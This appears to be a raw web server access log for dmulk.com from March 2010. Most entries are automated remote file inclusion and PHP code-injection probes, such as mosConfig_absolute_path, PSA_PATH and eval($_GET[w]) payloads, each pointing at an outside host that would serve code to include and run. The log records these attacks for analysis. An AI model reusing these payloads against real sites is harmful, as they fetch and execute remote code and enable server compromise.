85.233.162.183 - - [12/Mar/2010:09:03:58 -0800] "GET /logs/access_090424.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:04:00 -0800] "GET /atom.php5?page=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:04:00 -0800] "GET /logs//atom.php5?page=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:04:00 -0800] "GET /logs/access_091218.log%20%20//atom.php5?page=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.233.162.183 - - [12/Mar/2010:09:04:00 -0800] "GET /logs/access_081022.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.233.162.183 - - [12/Mar/2010:09:04:01 -0800] "GET /logs/access_081022.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:09:04:02 -0800] "GET /logs/access_080905.log%20%20/%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.233.162.183 - - [12/Mar/2010:09:04:07 -0800] "GET /logs/access_090424.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.233.162.183 - - [12/Mar/2010:09:04:13 -0800] "GET /logs/access_090424.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
123.143.29.250 - - [12/Mar/2010:09:04:13 -0800] "GET /logs/access_080619.log%20%20//include/bbs.lib.inc.php?site_path=http://www.gogos.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:09:04:19 -0800] "GET /logs/access_080905.log%20%20/%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.233.162.183 - - [12/Mar/2010:09:04:27 -0800] "GET /logs/access_090424.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:04:46 -0800] "GET /logs/access_081015.log//atom.php5?page=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.195.115.224 - - [12/Mar/2010:09:04:48 -0800] "GET /blog/index.php/2008/06/page/2/ HTTP/1.0" 200 11180 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:04:54 -0800] "GET /logs/access_081015.log%20%20//atom.php5?page=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.245.21.69 - - [12/Mar/2010:09:05:01 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.muzykologia.lublin.pl/templates/system/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.245.21.69 - - [12/Mar/2010:09:05:01 -0800] "GET /logs/access_080509.log//admin/business_inc/saveserver.php?thisdir=http://www.muzykologia.lublin.pl/templates/system/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.245.21.69 - - [12/Mar/2010:09:05:01 -0800] "GET /admin/business_inc/saveserver.php?thisdir=http://www.muzykologia.lublin.pl/templates/system/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.245.21.69 - - [12/Mar/2010:09:05:05 -0800] "GET /logs/access_090530.log//admin/business_inc/saveserver.php?thisdir=http://www.muzykologia.lublin.pl/templates/system/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:05:08 -0800] "GET /logs/access_081015.log%20%20//atom.php5?page=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:05:10 -0800] "GET /logs/access_081015.log%20%20//atom.php5?page=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.47.7.71 - - [12/Mar/2010:09:05:32 -0800] "GET /logs/access_090820.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sumanenter.com/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.47.7.71 - - [12/Mar/2010:09:05:32 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sumanenter.com/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.47.7.71 - - [12/Mar/2010:09:05:32 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sumanenter.com/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.101.214.54 - - [12/Mar/2010:09:05:40 -0800] "GET /logs/access_081223.log//inc/header.php/step_one.php?server_inc=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:05:45 -0800] "GET /logs/access_081015.log%20%20//atom.php5?page=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
123.143.29.250 - - [12/Mar/2010:09:05:52 -0800] "GET /logs/access_090620.log%20%20//include/bbs.lib.inc.php?site_path=http://www.gogos.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:05:53 -0800] "GET /logs/access_091208.log%20%20//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:05:53 -0800] "GET /include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:05:53 -0800] "GET /include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:05:53 -0800] "GET /logs//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:05:53 -0800] "GET /logs//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:05:53 -0800] "GET /logs/access_091208.log%20%20//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:06:16 -0800] "GET /logs//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:06:16 -0800] "GET /logs/access_080228.log//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:06:16 -0800] "GET /include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.55.133.120 - - [12/Mar/2010:09:06:27 -0800] "GET /logs/access_081014.log//index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.55.133.120 - - [12/Mar/2010:09:06:27 -0800] "GET /logs//index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [12/Mar/2010:09:06:29 -0800] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.9.1; http://dmulk.com/blog" "dmulk.com"
72.55.133.120 - - [12/Mar/2010:09:06:29 -0800] "GET /index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 200 15078 "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:06:41 -0800] "GET /logs/access_080228.log//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:06:41 -0800] "GET /logs//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:06:44 -0800] "GET /include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:06:45 -0800] "GET /include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:06:45 -0800] "GET /logs/access_091208.log//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:06:45 -0800] "GET /include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:06:45 -0800] "GET /logs//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:06:45 -0800] "GET /logs/access_080228.log//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:06:48 -0800] "GET /logs//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:06:49 -0800] "GET /include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:06:49 -0800] "GET /logs//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:06:50 -0800] "GET /logs/access_091208.log//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.55.133.120 - - [12/Mar/2010:09:06:51 -0800] "GET /logs/access_080519.log//index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "dmulk.com"
72.55.133.120 - - [12/Mar/2010:09:06:51 -0800] "GET /logs//index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "dmulk.com"
72.55.133.120 - - [12/Mar/2010:09:06:51 -0800] "GET /logs//index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.55.133.120 - - [12/Mar/2010:09:06:51 -0800] "GET /logs/access_090424.log//index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.55.133.120 - - [12/Mar/2010:09:06:52 -0800] "GET /index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 200 15078 "-" "Mozilla/5.0" "dmulk.com"
72.55.133.120 - - [12/Mar/2010:09:06:52 -0800] "GET /index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 200 15078 "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:06:52 -0800] "GET /logs/access_090815.log//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:06:54 -0800] "GET /logs/access_090815.log//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.55.133.120 - - [12/Mar/2010:09:06:57 -0800] "GET /logs/access_090519.log//index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.55.133.120 - - [12/Mar/2010:09:07:07 -0800] "GET /logs/access_080519.log//index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "dmulk.com"
72.55.133.120 - - [12/Mar/2010:09:07:07 -0800] "GET /logs//index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "dmulk.com"
72.55.133.120 - - [12/Mar/2010:09:07:07 -0800] "GET /logs//index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.55.133.120 - - [12/Mar/2010:09:07:07 -0800] "GET /logs/access_090424.log//index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.55.133.120 - - [12/Mar/2010:09:07:07 -0800] "GET /index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 200 15078 "-" "Mozilla/5.0" "dmulk.com"
72.55.133.120 - - [12/Mar/2010:09:07:08 -0800] "GET /index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 200 15078 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.82.173 - - [12/Mar/2010:09:07:18 -0800] "GET /modules/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.mangosteenforsale.com/mango/images/demo.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.dmulk.com"
72.55.133.120 - - [12/Mar/2010:09:07:19 -0800] "GET /logs/access_081014.log//index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.55.133.120 - - [12/Mar/2010:09:07:19 -0800] "GET /logs//index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
122.201.82.173 - - [12/Mar/2010:09:07:19 -0800] "GET /components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.mangosteenforsale.com/mango/images/demo.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.dmulk.com"
72.55.133.120 - - [12/Mar/2010:09:07:20 -0800] "GET /index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 200 15078 "-" "Mozilla/5.0" "www.dmulk.com"
99.57.90.154 - - [12/Mar/2010:09:07:25 -0800] "GET /logs/access_080313.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:07:26 -0800] "GET /include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:07:26 -0800] "GET /logs//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:07:29 -0800] "GET /logs/access_080228.log//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
190.152.217.250 - - [12/Mar/2010:09:07:29 -0800] "GET /logs/access_081103.log/%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.huacabrava.com/media/sh404_upgrade_conf_security/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
190.152.217.250 - - [12/Mar/2010:09:07:29 -0800] "GET /%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.huacabrava.com/media/sh404_upgrade_conf_security/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
190.152.217.250 - - [12/Mar/2010:09:07:29 -0800] "GET /logs/%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.huacabrava.com/media/sh404_upgrade_conf_security/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
190.152.217.250 - - [12/Mar/2010:09:07:30 -0800] "GET /logs/access_090107.log/%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.huacabrava.com/media/sh404_upgrade_conf_security/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:07:52 -0800] "GET /logs/access_091218.log//atom.php5?page=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.55.133.120 - - [12/Mar/2010:09:07:54 -0800] "GET /logs/access_090519.log//index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.49.211.210 - - [12/Mar/2010:09:07:54 -0800] "GET /logs/access_080708.log%22onmouseover=http://immortal-killaz.servercamp.de/fanatix/cmdstate.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:07:55 -0800] "GET /logs/access_081015.log//atom.php5?page=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:08:02 -0800] "GET /logs/access_091218.log//atom.php5?page=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:08:02 -0800] "GET /logs/access_081015.log//atom.php5?page=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.208.46.145 - - [12/Mar/2010:09:08:09 -0800] "GET /logs/access_080127.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.208.46.145 - - [12/Mar/2010:09:08:18 -0800] "GET /logs/access_080111.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:08:23 -0800] "GET /logs/access_080313.log//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:08:23 -0800] "GET /logs//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:08:23 -0800] "GET /include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:08:32 -0800] "GET /logs/access_091218.log//atom.php5?page=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:08:38 -0800] "GET /logs/access_081015.log//atom.php5?page=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:08:38 -0800] "GET /logs/access_091218.log//atom.php5?page=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:08:38 -0800] "GET /logs/access_081015.log//atom.php5?page=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:08:39 -0800] "GET /logs/access_080530.log//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:08:42 -0800] "GET /logs/access_090815.log%20%20//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:08:43 -0800] "GET /logs/access_090815.log%20%20//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
99.57.90.154 - - [12/Mar/2010:09:08:47 -0800] "GET /logs/access_080205.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
99.57.90.154 - - [12/Mar/2010:09:08:47 -0800] "GET /logs/access_090425.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:08:48 -0800] "GET /include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:08:48 -0800] "GET /logs/access_080313.log//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:08:48 -0800] "GET /logs//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.217.76.226 - - [12/Mar/2010:09:08:57 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tribal-zone.fr//administrator/components/com_virtuemart/sql/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.217.76.226 - - [12/Mar/2010:09:08:57 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tribal-zone.fr//administrator/components/com_virtuemart/sql/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.217.76.226 - - [12/Mar/2010:09:08:57 -0800] "GET /logs/access_090505.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tribal-zone.fr//administrator/components/com_virtuemart/sql/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
123.143.29.250 - - [12/Mar/2010:09:09:21 -0800] "GET /auth/auth_phpbb/phpbb_root_path=http://www.gogos.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
123.143.29.250 - - [12/Mar/2010:09:09:21 -0800] "GET /logs/access_080718.log%20%20/auth/auth_phpbb/phpbb_root_path=http://www.gogos.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
123.143.29.250 - - [12/Mar/2010:09:09:21 -0800] "GET /logs/auth/auth_phpbb/phpbb_root_path=http://www.gogos.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.205.50.6 - - [12/Mar/2010:09:09:21 -0800] "GET /logs/playing.php/common/db.php?commonpath=http://www.espace-poker.com/cok/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.205.50.6 - - [12/Mar/2010:09:09:21 -0800] "GET /playing.php/common/db.php?commonpath=http://www.espace-poker.com/cok/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.205.50.6 - - [12/Mar/2010:09:09:21 -0800] "GET /logs/access_080609.log%20%20/playing.php/common/db.php?commonpath=http://www.espace-poker.com/cok/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:09:34 -0800] "GET /logs/access_080530.log//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:09:35 -0800] "GET /logs/access_090424.log/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.149.84.46 - - [12/Mar/2010:09:09:36 -0800] "GET /include/setup.php?dir=http://cyberzins.fileave.com/n1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.149.84.46 - - [12/Mar/2010:09:09:36 -0800] "GET /logs/access_071228.log%20%20//include/setup.php?dir=http://cyberzins.fileave.com/n1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.149.84.46 - - [12/Mar/2010:09:09:36 -0800] "GET /logs//include/setup.php?dir=http://cyberzins.fileave.com/n1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.205.50.6 - - [12/Mar/2010:09:09:48 -0800] "GET /logs/access_100201.log%20%20/playing.php/common/db.php?commonpath=http://www.espace-poker.com/cok/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:09:58 -0800] "GET /logs/access_090424.log/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
